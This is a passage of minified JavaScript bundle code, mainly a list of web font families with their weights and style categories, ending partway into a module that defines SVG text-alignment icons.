Sans",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Nabla",v:[400],f:"display"},{n:"Noto Color Emoji",v:[400],f:"sans-serif"},{n:"Noto Sans Chorasmian",v:[400],f:"sans-serif"},{n:"Noto Sans Ethiopic",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Lao Looped",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Mende Kikakui",v:[400],f:"sans-serif"},{n:"Noto Sans Nag Mundari",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Nandinagari",v:[400],f:"sans-serif"},{n:"Noto Sans SignWriting",v:[400],f:"sans-serif"},{n:"Noto Sans Tangsa",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Serif HK",v:[200,300,400,500,600,700,800,900],f:"serif"},{n:"Noto Serif NP Hmong",v:[400,500,600,700],f:"serif"},{n:"Noto Serif Oriya",v:[400,500,600,700],f:"serif"},{n:"Noto Serif Toto",v:[400,500,600,700],f:"serif"},{n:"Nuosu SIL",v:[400],f:"serif"},{n:"Odibee Sans",v:[400],f:"display"},{n:"Odor Mean Chey",v:[400],f:"serif"},{n:"Offside",v:[400],f:"display"},{n:"Oi",v:[400],f:"display"},{n:"Old Standard TT",v:[400,"400i",700],f:"serif"},{n:"Oldenburg",v:[400],f:"display"},{n:"Ole",v:[400],f:"handwriting"},{n:"Oleo Script",v:[400,700],f:"display"},{n:"Oleo Script Swash Caps",v:[400,700],f:"display"},{n:"Oooh Baby",v:[400],f:"handwriting"},{n:"Open Sans",v:["300",400,500,600,700,800,"300i","400i","500i","600i","700i","800i"],f:"sans-serif"},{n:"Oranienbaum",v:[400],f:"serif"},{n:"Orbitron",v:[400,500,600,700,800,900],f:"sans-serif"},{n:"Oregano",v:[400,"400i"],f:"display"},{n:"Orelega One",v:[400],f:"display"},{n:"Orienta",v:[400],f:"sans-serif"},{n:"Original Surfer",v:[400],f:"display"},{n:"Oswald",v:["200","300",400,500,600,700],f:"sans-serif"},{n:"Outfit",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Over the Rainbow",v:[400],f:"handwriting"},{n:"Overlock",v:[400,"400i",700,"700i",900,"900i"],f:"display"},{n:"Overlock SC",v:[400],f:"display"},{n:"Overpass",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Overpass Mono",v:["300",400,500,600,700],f:"monospace"},{n:"Ovo",v:[400],f:"serif"},{n:"Oxanium",v:["200","300",400,500,600,700,800],f:"display"},{n:"Oxygen",v:["300",400,700],f:"sans-serif"},{n:"Oxygen Mono",v:[400],f:"monospace"},{n:"PT Mono",v:[400],f:"monospace"},{n:"PT Sans",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"PT Sans Caption",v:[400,700],f:"sans-serif"},{n:"PT Sans Narrow",v:[400,700],f:"sans-serif"},{n:"PT Serif",v:[400,"400i",700,"700i"],f:"serif"},{n:"PT Serif Caption",v:[400,"400i"],f:"serif"},{n:"Pacifico",v:[400],f:"handwriting"},{n:"Padauk",v:[400,700],f:"sans-serif"},{n:"Palanquin",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"Palanquin Dark",v:[400,500,600,700],f:"sans-serif"},{n:"Pangolin",v:[400],f:"handwriting"},{n:"Paprika",v:[400],f:"display"},{n:"Parisienne",v:[400],f:"handwriting"},{n:"Passero One",v:[400],f:"display"},{n:"Passion One",v:[400,700,900],f:"display"},{n:"Passions Conflict",v:[400],f:"handwriting"},{n:"Pathway Gothic One",v:[400],f:"sans-serif"},{n:"Patrick Hand",v:[400],f:"handwriting"},{n:"Patrick Hand SC",v:[400],f:"handwriting"},{n:"Pattaya",v:[400],f:"sans-serif"},{n:"Patua One",v:[400],f:"display"},{n:"Pavanam",v:[400],f:"sans-serif"},{n:"Paytone One",v:[400],f:"sans-serif"},{n:"Peddana",v:[400],f:"serif"},{n:"Peralta",v:[400],f:"display"},{n:"Permanent Marker",v:[400],f:"handwriting"},{n:"Petemoss",v:[400],f:"handwriting"},{n:"Petit Formal Script",v:[400],f:"handwriting"},{n:"Petrona",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Philosopher",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Piazzolla",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Piedra",v:[400],f:"display"},{n:"Pinyon Script",v:[400],f:"handwriting"},{n:"Pirata One",v:[400],f:"display"},{n:"Plaster",v:[400],f:"display"},{n:"Play",v:[400,700],f:"sans-serif"},{n:"Playball",v:[400],f:"display"},{n:"Playfair Display",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Playfair Display SC",v:[400,"400i",700,"700i",900,"900i"],f:"serif"},{n:"Plus Jakarta Sans",v:["200","300",400,500,600,700,800,"200i","300i","400i","500i","600i","700i","800i"],f:"sans-serif"},{n:"Podkova",v:[400,500,600,700,800],f:"serif"},{n:"Poiret One",v:[400],f:"display"},{n:"Poller One",v:[400],f:"display"},{n:"Poly",v:[400,"400i"],f:"serif"},{n:"Pompiere",v:[400],f:"display"},{n:"Pontano Sans",v:[300,400,500,600,700],f:"sans-serif"},{n:"Poor Story",v:[400],f:"display"},{n:"Poppins",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Port Lligat Sans",v:[400],f:"sans-serif"},{n:"Port Lligat Slab",v:[400],f:"serif"},{n:"Potta One",v:[400],f:"display"},{n:"Pragati Narrow",v:[400,700],f:"sans-serif"},{n:"Praise",v:[400],f:"handwriting"},{n:"Prata",v:[400],f:"serif"},{n:"Preahvihear",v:[400],f:"sans-serif"},{n:"Press Start 2P",v:[400],f:"display"},{n:"Pridi",v:["200","300",400,500,600,700],f:"serif"},{n:"Princess Sofia",v:[400],f:"handwriting"},{n:"Prociono",v:[400],f:"serif"},{n:"Prompt",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Prosto One",v:[400],f:"display"},{n:"Proza Libre",v:[400,"400i",500,"500i",600,"600i",700,"700i",800,"800i"],f:"sans-serif"},{n:"Public Sans",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Puppies Play",v:[400],f:"handwriting"},{n:"Puritan",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Purple Purse",v:[400],f:"display"},{n:"Padyakke Expanded One",v:[400],f:"display"},{n:"Pathway Extreme",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Phudu",v:[300,400,500,600,700,800,900],f:"display"},{n:"Playfair",v:[300,400,500,600,700,800,900,"300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Poltawski Nowy",v:[400,500,600,700,"400i","500i","600i","700i"],f:"serif"},{n:"Qahiri",v:[400],f:"sans-serif"},{n:"Quando",v:[400],f:"serif"},{n:"Quantico",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Quattrocento",v:[400,700],f:"serif"},{n:"Quattrocento Sans",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Questrial",v:[400],f:"sans-serif"},{n:"Quicksand",v:["300",400,500,600,700],f:"sans-serif"},{n:"Quintessential",v:[400],f:"handwriting"},{n:"Qwigley",v:[400],f:"handwriting"},{n:"Qwitcher Grypen",v:[400,700],f:"handwriting"},{n:"Racing Sans One",v:[400],f:"display"},{n:"Radio Canada",v:[300,400,500,600,700,"300i","400i","500i","600i","700i"],f:"sans-serif"},{n:"Radley",v:[400,"400i"],f:"serif"},{n:"Rajdhani",v:["300",400,500,600,700],f:"sans-serif"},{n:"Rakkas",v:[400],f:"display"},{n:"Raleway",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Raleway Dots",v:[400],f:"display"},{n:"Ramabhadra",v:[400],f:"sans-serif"},{n:"Ramaraja",v:[400],f:"serif"},{n:"Rambla",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Rammetto One",v:[400],f:"display"},{n:"Rampart One",v:[400],f:"display"},{n:"Ranchers",v:[400],f:"display"},{n:"Rancho",v:[400],f:"handwriting"},{n:"Ranga",v:[400,700],f:"display"},{n:"Rasa",v:["300",400,500,600,700,"300i","400i","500i","600i","700i"],f:"serif"},{n:"Rationale",v:[400],f:"sans-serif"},{n:"Ravi Prakash",v:[400],f:"display"},{n:"Readex Pro",v:["200","300",400,500,600,700],f:"sans-serif"},{n:"Recursive",v:["300",400,500,600,700,800,900],f:"sans-serif"},{n:"Red Hat Display",v:["300",400,500,600,700,800,900,"300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Red Hat Mono",v:["300",400,500,600,700,"300i","400i","500i","600i","700i"],f:"monospace"},{n:"Red Hat Text",v:["300",400,500,600,700,"300i","400i","500i","600i","700i"],f:"sans-serif"},{n:"Red Rose",v:["300",400,500,600,700],f:"display"},{n:"Redacted",v:[400],f:"display"},{n:"Redacted Script",v:["300",400,700],f:"display"},{n:"Redressed",v:[400],f:"handwriting"},{n:"Reem Kufi",v:[400,500,600,700],f:"sans-serif"},{n:"Reenie Beanie",v:[400],f:"handwriting"},{n:"Reggae One",v:[400],f:"display"},{n:"Revalia",v:[400],f:"display"},{n:"Rhodium Libre",v:[400],f:"serif"},{n:"Ribeye",v:[400],f:"display"},{n:"Ribeye Marrow",v:[400],f:"display"},{n:"Righteous",v:[400],f:"display"},{n:"Risque",v:[400],f:"display"},{n:"Road Rage",v:[400],f:"display"},{n:"Roboto",v:["100","100i","300","300i",400,"400i",500,"500i",700,"700i",900,"900i"],f:"sans-serif"},{n:"Roboto Condensed",v:["300","300i",400,"400i",700,"700i"],f:"sans-serif"},{n:"Roboto Flex",v:[400],f:"sans-serif"},{n:"Roboto Mono",v:["100","200","300",400,500,600,700,"100i","200i","300i","400i","500i","600i","700i"],f:"monospace"},{n:"Roboto Serif",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Roboto Slab",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Rochester",v:[400],f:"handwriting"},{n:"Rock Salt",v:[400],f:"handwriting"},{n:"RocknRoll One",v:[400],f:"sans-serif"},{n:"Rokkitt",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Romanesco",v:[400],f:"handwriting"},{n:"Ropa Sans",v:[400,"400i"],f:"sans-serif"},{n:"Rosario",v:["300",400,500,600,700,"300i","400i","500i","600i","700i"],f:"sans-serif"},{n:"Rosarivo",v:[400,"400i"],f:"serif"},{n:"Rouge Script",v:[400],f:"handwriting"},{n:"Rowdies",v:["300",400,700],f:"display"},{n:"Rozha One",v:[400],f:"serif"},{n:"Rubik",v:["300",400,500,600,700,800,900,"300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Rubik Beastly",v:[400],f:"display"},{n:"Rubik Bubbles",v:[400],f:"display"},{n:"Rubik Glitch",v:[400],f:"display"},{n:"Rubik Microbe",v:[400],f:"display"},{n:"Rubik Mono One",v:[400],f:"sans-serif"},{n:"Rubik Moonrocks",v:[400],f:"display"},{n:"Rubik Puddles",v:[400],f:"display"},{n:"Rubik Wet Paint",v:[400],f:"display"},{n:"Ruda",v:[400,500,600,700,800,900],f:"sans-serif"},{n:"Rufina",v:[400,700],f:"serif"},{n:"Ruge Boogie",v:[400],f:"handwriting"},{n:"Ruluko",v:[400],f:"sans-serif"},{n:"Rum Raisin",v:[400],f:"sans-serif"},{n:"Ruslan Display",v:[400],f:"display"},{n:"Russo One",v:[400],f:"sans-serif"},{n:"Ruthie",v:[400],f:"handwriting"},{n:"Rye",v:[400],f:"display"},{n:"Reem Kufi Fun",v:[400,500,600,700],f:"sans-serif"},{n:"Reem Kufi Ink",v:[400],f:"sans-serif"},{n:"Rubik 80s Fade",v:[400],f:"display"},{n:"Rubik Burned",v:[400],f:"display"},{n:"Rubik Dirt",v:[400],f:"display"},{n:"Rubik Distressed",v:[400],f:"display"},{n:"Rubik Gemstones",v:[400],f:"display"},{n:"Rubik Iso",v:[400],f:"display"},{n:"Rubik Marker Hatch",v:[400],f:"display"},{n:"Rubik Maze",v:[400],f:"display"},{n:"Rubik Pixels",v:[400],f:"display"},{n:"Rubik Spray Paint",v:[400],f:"display"},{n:"Rubik Storm",v:[400],f:"display"},{n:"Rubik Vinyl",v:[400],f:"display"},{n:"STIX Two Text",v:[400,500,600,700,"400i","500i","600i","700i"],f:"serif"},{n:"Sacramento",v:[400],f:"handwriting"},{n:"Sahitya",v:[400,700],f:"serif"},{n:"Sail",v:[400],f:"display"},{n:"Saira",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Saira Condensed",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Saira Extra Condensed",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Saira Semi Condensed",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Saira Stencil One",v:[400],f:"display"},{n:"Salsa",v:[400],f:"display"},{n:"Sanchez",v:[400,"400i"],f:"serif"},{n:"Sancreek",v:[400],f:"display"},{n:"Sansita",v:[400,"400i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Sansita Swashed",v:["300",400,500,600,700,800,900],f:"display"},{n:"Sarabun",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i"],f:"sans-serif"},{n:"Sarala",v:[400,700],f:"sans-serif"},{n:"Sarina",v:[400],f:"display"},{n:"Sarpanch",v:[400,500,600,700,800,900],f:"sans-serif"},{n:"Sassy Frass",v:[400],f:"handwriting"},{n:"Satisfy",v:[400],f:"handwriting"},{n:"Sawarabi Gothic",v:[400],f:"sans-serif"},{n:"Sawarabi Mincho",v:[400],f:"serif"},{n:"Scada",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Scheherazade New",v:[400,500,600,700],f:"serif"},{n:"Schoolbell",v:[400],f:"handwriting"},{n:"Scope One",v:[400],f:"serif"},{n:"Seaweed Script",v:[400],f:"display"},{n:"Secular One",v:[400],f:"sans-serif"},{n:"Sedgwick Ave",v:[400],f:"handwriting"},{n:"Sedgwick Ave Display",v:[400],f:"handwriting"},{n:"Sen",v:[400,700,800],f:"sans-serif"},{n:"Send Flowers",v:[400],f:"handwriting"},{n:"Sevillana",v:[400],f:"display"},{n:"Seymour One",v:[400],f:"sans-serif"},{n:"Shadows Into Light",v:[400],f:"handwriting"},{n:"Shadows Into Light Two",v:[400],f:"handwriting"},{n:"Shalimar",v:[400],f:"handwriting"},{n:"Shanti",v:[400],f:"sans-serif"},{n:"Share",v:[400,"400i",700,"700i"],f:"display"},{n:"Share Tech",v:[400],f:"sans-serif"},{n:"Share Tech Mono",v:[400],f:"monospace"},{n:"Shippori Antique",v:[400],f:"sans-serif"},{n:"Shippori Antique B1",v:[400],f:"sans-serif"},{n:"Shippori Mincho",v:[400,500,600,700,800],f:"serif"},{n:"Shippori Mincho B1",v:[400,500,600,700,800],f:"serif"},{n:"Shojumaru",v:[400],f:"display"},{n:"Short Stack",v:[400],f:"handwriting"},{n:"Shrikhand",v:[400],f:"display"},{n:"Siemreap",v:[400],f:"display"},{n:"Sigmar One",v:[400],f:"display"},{n:"Signika",v:["300",400,500,600,700],f:"sans-serif"},{n:"Signika Negative",v:["300",400,500,600,700],f:"sans-serif"},{n:"Simonetta",v:[400,"400i",900,"900i"],f:"display"},{n:"Single Day",v:[400],f:"display"},{n:"Sintony",v:[400,700],f:"sans-serif"},{n:"Sirin Stencil",v:[400],f:"display"},{n:"Six Caps",v:[400],f:"sans-serif"},{n:"Skranji",v:[400,700],f:"display"},{n:"Slabo 13px",v:[400],f:"serif"},{n:"Slabo 27px",v:[400],f:"serif"},{n:"Slackey",v:[400],f:"display"},{n:"Smokum",v:[400],f:"display"},{n:"Smooch",v:[400],f:"handwriting"},{n:"Smooch Sans",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Smythe",v:[400],f:"display"},{n:"Sniglet",v:[400,800],f:"display"},{n:"Snippet",v:[400],f:"sans-serif"},{n:"Snowburst One",v:[400],f:"display"},{n:"Sofadi One",v:[400],f:"display"},{n:"Sofia",v:[400],f:"handwriting"},{n:"Solway",v:["300",400,500,700,800],f:"serif"},{n:"Song Myung",v:[400],f:"serif"},{n:"Sonsie One",v:[400],f:"display"},{n:"Sora",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Sorts Mill Goudy",v:[400,"400i"],f:"serif"},{n:"Source Code Pro",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"monospace"},{n:"Source Sans 3",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Source Sans Pro",v:["200","200i","300","300i",400,"400i",600,"600i",700,"700i",900,"900i"],f:"sans-serif"},{n:"Source Serif 4",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Source Serif Pro",v:["200","200i","300","300i",400,"400i",600,"600i",700,"700i",900,"900i"],f:"serif"},{n:"Space Grotesk",v:["300",400,500,600,700],f:"sans-serif"},{n:"Space Mono",v:[400,"400i",700,"700i"],f:"monospace"},{n:"Special Elite",v:[400],f:"display"},{n:"Spectral",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i"],f:"serif"},{n:"Spectral SC",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i"],f:"serif"},{n:"Spicy Rice",v:[400],f:"display"},{n:"Spinnaker",v:[400],f:"sans-serif"},{n:"Spirax",v:[400],f:"display"},{n:"Spline Sans",v:["300",400,500,600,700],f:"sans-serif"},{n:"Squada One",v:[400],f:"display"},{n:"Square Peg",v:[400],f:"handwriting"},{n:"Sree Krushnadevaraya",v:[400],f:"serif"},{n:"Sriracha",v:[400],f:"handwriting"},{n:"Srisakdi",v:[400,700],f:"display"},{n:"Staatliches",v:[400],f:"display"},{n:"Stalemate",v:[400],f:"handwriting"},{n:"Stalinist One",v:[400],f:"display"},{n:"Stardos Stencil",v:[400,700],f:"display"},{n:"Stick",v:[400],f:"sans-serif"},{n:"Stick No Bills",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Stint Ultra Condensed",v:[400],f:"display"},{n:"Stint Ultra Expanded",v:[400],f:"display"},{n:"Stoke",v:["300",400],f:"serif"},{n:"Strait",v:[400],f:"sans-serif"},{n:"Style Script",v:[400],f:"handwriting"},{n:"Stylish",v:[400],f:"sans-serif"},{n:"Sue Ellen Francisco",v:[400],f:"handwriting"},{n:"Suez One",v:[400],f:"serif"},{n:"Sulphur Point",v:["300",400,700],f:"sans-serif"},{n:"Sumana",v:[400,700],f:"serif"},{n:"Sunflower",v:["300",500,700],f:"sans-serif"},{n:"Sunshiney",v:[400],f:"handwriting"},{n:"Supermercado One",v:[400],f:"display"},{n:"Sura",v:[400,700],f:"serif"},{n:"Suranna",v:[400],f:"serif"},{n:"Suravaram",v:[400],f:"serif"},{n:"Suwannaphum",v:["100","300",400,700,900],f:"serif"},{n:"Swanky and Moo Moo",v:[400],f:"handwriting"},{n:"Syncopate",v:[400,700],f:"sans-serif"},{n:"Syne",v:[400,500,600,700,800],f:"sans-serif"},{n:"Syne Mono",v:[400],f:"monospace"},{n:"Syne Tactile",v:[400],f:"display"},{n:"Schibsted Grotesk",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Shantell Sans",v:[300,400,500,600,700,800,"300i","400i","500i","600i","700i","800i"],f:"display"},{n:"Sigmar",v:[400],f:"display"},{n:"Silkscreen",v:[400,700],f:"display"},{n:"Slackside One",v:[400],f:"handwriting"},{n:"Sofia Sans",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Sofia Sans Condensed",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Sofia Sans Extra Condensed",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Sofia Sans Semi Condensed",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Solitreo",v:[400],f:"handwriting"},{n:"Sono",v:[200,300,400,500,600,700,800],f:"sans-serif"},{n:"Splash",v:[400],f:"handwriting"},{n:"Spline Sans Mono",v:[300,400,500,600,700,"300i","400i","500i","600i","700i"],f:"monospace"},{n:"Tajawal",v:["200","300",400,500,700,800,900],f:"sans-serif"},{n:"Tangerine",v:[400,700],f:"handwriting"},{n:"Tapestry",v:[400],f:"handwriting"},{n:"Taprom",v:[400],f:"display"},{n:"Tauri",v:[400],f:"sans-serif"},{n:"Taviraj",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"serif"},{n:"Teko",v:["300",400,500,600,700],f:"sans-serif"},{n:"Telex",v:[400],f:"sans-serif"},{n:"Tenali Ramakrishna",v:[400],f:"sans-serif"},{n:"Tenor Sans",v:[400],f:"sans-serif"},{n:"Text Me One",v:[400],f:"sans-serif"},{n:"Texturina",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Thasadith",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"The Girl Next Door",v:[400],f:"handwriting"},{n:"The Nautigal",v:[400,700],f:"handwriting"},{n:"Tienne",v:[400,700,900],f:"serif"},{n:"Tillana",v:[400,500,600,700,800],f:"handwriting"},{n:"Timmana",v:[400],f:"sans-serif"},{n:"Tinos",v:[400,"400i",700,"700i"],f:"serif"},{n:"Titan One",v:[400],f:"display"},{n:"Titillium Web",v:["200","200i","300","300i",400,"400i",600,"600i",700,"700i",900],f:"sans-serif"},{n:"Tomorrow",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Tourney",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"display"},{n:"Trade Winds",v:[400],f:"display"},{n:"Train One",v:[400],f:"display"},{n:"Trirong",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"serif"},{n:"Trispace",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Trocchi",v:[400],f:"serif"},{n:"Trochut",v:[400,"400i",700],f:"display"},{n:"Truculenta",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Trykker",v:[400],f:"serif"},{n:"Tulpen One",v:[400],f:"display"},{n:"Turret Road",v:["200","300",400,500,700,800],f:"display"},{n:"Twinkle Star",v:[400],f:"handwriting"},{n:"Tai Heritage Pro",v:[400,700],f:"serif"},{n:"Tilt Neon",v:[400],f:"display"},{n:"Tilt Prism",v:[400],f:"display"},{n:"Tilt Warp",v:[400],f:"display"},{n:"Tiro Bangla",v:[400,"400i"],f:"serif"},{n:"Tiro Devanagari Hindi",v:[400,"400i"],f:"serif"},{n:"Tiro Devanagari Marathi",v:[400,"400i"],f:"serif"},{n:"Tiro Devanagari Sanskrit",v:[400,"400i"],f:"serif"},{n:"Tiro Gurmukhi",v:[400,"400i"],f:"serif"},{n:"Tiro Kannada",v:[400,"400i"],f:"serif"},{n:"Tiro Tamil",v:[400,"400i"],f:"serif"},{n:"Tiro Telugu",v:[400,"400i"],f:"serif"},{n:"Tsukimi Rounded",v:[300,400,500,600,700],f:"sans-serif"},{n:"Ubuntu",v:["300","300i",400,"400i",500,"500i",700,"700i"],f:"sans-serif"},{n:"Ubuntu Condensed",v:[400],f:"sans-serif"},{n:"Ubuntu Mono",v:[400,"400i",700,"700i"],f:"monospace"},{n:"Uchen",v:[400],f:"serif"},{n:"Ultra",v:[400],f:"serif"},{n:"Uncial Antiqua",v:[400],f:"display"},{n:"Underdog",v:[400],f:"display"},{n:"Unica One",v:[400],f:"display"},{n:"UnifrakturCook",v:[700],f:"display"},{n:"UnifrakturMaguntia",v:[400],f:"display"},{n:"Unkempt",v:[400,700],f:"display"},{n:"Unlock",v:[400],f:"display"},{n:"Unna",v:[400,"400i",700,"700i"],f:"serif"},{n:"Updock",v:[400],f:"handwriting"},{n:"Urbanist",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Unbounded",v:[200,300,400,500,600,700,800,900],f:"display"},{n:"VT323",v:[400],f:"monospace"},{n:"Vampiro One",v:[400],f:"display"},{n:"Varela",v:[400],f:"sans-serif"},{n:"Varela Round",v:[400],f:"sans-serif"},{n:"Varta",v:["300",400,500,600,700],f:"sans-serif"},{n:"Vast Shadow",v:[400],f:"display"},{n:"Vazirmatn",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Vesper Libre",v:[400,500,700,900],f:"serif"},{n:"Viaoda Libre",v:[400],f:"display"},{n:"Vibes",v:[400],f:"display"},{n:"Vibur",v:[400],f:"handwriting"},{n:"Vidaloka",v:[400],f:"serif"},{n:"Viga",v:[400],f:"sans-serif"},{n:"Voces",v:[400],f:"display"},{n:"Volkhov",v:[400,"400i",700,"700i"],f:"serif"},{n:"Vollkorn",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Vollkorn SC",v:[400,600,700,900],f:"serif"},{n:"Voltaire",v:[400],f:"sans-serif"},{n:"Vujahday Script",v:[400],f:"handwriting"},{n:"Vina Sans",v:[400],f:"display"},{n:"Waiting for the Sunrise",v:[400],f:"handwriting"},{n:"Wallpoet",v:[400],f:"display"},{n:"Walter Turncoat",v:[400],f:"handwriting"},{n:"Warnes",v:[400],f:"display"},{n:"Water Brush",v:[400],f:"handwriting"},{n:"Waterfall",v:[400],f:"handwriting"},{n:"Wellfleet",v:[400],f:"display"},{n:"Wendy One",v:[400],f:"sans-serif"},{n:"Whisper",v:[400],f:"handwriting"},{n:"WindSong",v:[400,500],f:"handwriting"},{n:"Wire One",v:[400],f:"sans-serif"},{n:"Work Sans",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Wix Madefor Display",v:[400,500,600,700,800],f:"sans-serif"},{n:"Wix Madefor Text",v:[400,"400i",500,"500i",600,"600i",700,"700i",800,"800i"],f:"sans-serif"},{n:"Xanh Mono",v:[400,"400i"],f:"monospace"},{n:"Yaldevi",v:["200","300",400,500,600,700],f:"sans-serif"},{n:"Yanone Kaffeesatz",v:["200","300",400,500,600,700],f:"sans-serif"},{n:"Yantramanav",v:["100","300",400,500,700,900],f:"sans-serif"},{n:"Yatra One",v:[400],f:"display"},{n:"Yellowtail",v:[400],f:"handwriting"},{n:"Yeon Sung",v:[400],f:"display"},{n:"Yeseva One",v:[400],f:"display"},{n:"Yesteryear",v:[400],f:"handwriting"},{n:"Yomogi",v:[400],f:"handwriting"},{n:"Yrsa",v:["300",400,500,600,700,"300i","400i","500i","600i","700i"],f:"serif"},{n:"Yuji Boku",v:[400],f:"serif"},{n:"Yuji Mai",v:[400],f:"serif"},{n:"Yuji Syuku",v:[400],f:"serif"},{n:"Yusei Magic",v:[400],f:"sans-serif"},{n:"Ysabeau",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"ZCOOL KuaiLe",v:[400],f:"sans-serif"},{n:"ZCOOL QingKe HuangYou",v:[400],f:"sans-serif"},{n:"ZCOOL XiaoWei",v:[400],f:"sans-serif"},{n:"Zen Antique",v:[400],f:"serif"},{n:"Zen Antique Soft",v:[400],f:"serif"},{n:"Zen Dots",v:[400],f:"display"},{n:"Zen Kaku Gothic Antique",v:["300",400,500,700,900],f:"sans-serif"},{n:"Zen Kaku Gothic New",v:["300",400,500,700,900],f:"sans-serif"},{n:"Zen Kurenaido",v:[400],f:"sans-serif"},{n:"Zen Loop",v:[400,"400i"],f:"display"},{n:"Zen Maru Gothic",v:["300",400,500,700,900],f:"sans-serif"},{n:"Zen Old Mincho",v:[400,500,600,700,900],f:"serif"},{n:"Zen Tokyo Zoo",v:[400],f:"display"},{n:"Zeyada",v:[400],f:"handwriting"},{n:"Zhi Mang Xing",v:[400],f:"handwriting"},{n:"Zilla Slab",v:["300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"serif"},{n:"Zilla Slab Highlight",v:[400,700],f:"display"}]},7763:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var a=n(7294);const r={};r.left=(0,a.createElement)("svg",{width:24,height:24,xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M4 19.8h8.9v-1.5H4v1.5zm8.9-15.6H4v1.5h8.9V4.2zm-8.9 